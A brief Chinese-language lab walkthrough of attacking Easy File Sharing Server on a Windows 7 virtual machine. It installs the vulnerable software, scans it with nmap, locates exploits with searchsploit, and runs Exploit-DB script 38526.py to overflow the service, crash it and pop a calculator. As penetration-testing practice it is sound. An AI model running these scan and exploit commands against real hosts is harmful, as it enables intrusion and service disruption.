easy file sharing server-漏洞的简单利用
1.win7靶机安装easy file sharing server
将efssetup_2018.zip解压安装到win7虚拟机中,然后将port改为8000然后点击restart
即可,如下图
2.使用nmap扫描主机
nmap -sV -A -o easy-file.txt 192.168.126.132
-sV 服务版本识别
-A 强力检测选项,得到更多信息
-o 将扫描结果写入文件
可以看见目标主机开启了Easy File Sharing 服务
3.搜索可利用漏洞脚本
searchsploit Easy File Sharing Web Server
可以看见有很多可以利用的脚本,这里我们随机选择38526.py
脚本,其他也是可以的
4.利用漏洞脚本
python /usr/share/exploitdb/exploits/windows/remote/38526.py 192.168.126.132 8000
5.efssetup_2018下载地址
链接:https://pan.baidu.com/s/1iHpD4RfUKGYcWDAuvqoYZQ
提取码:1csv
6.总结
这个主要是利用溢出漏洞攻击目标并让其服务崩溃和让主机运行计算器,主要是演练了一下渗透的过程。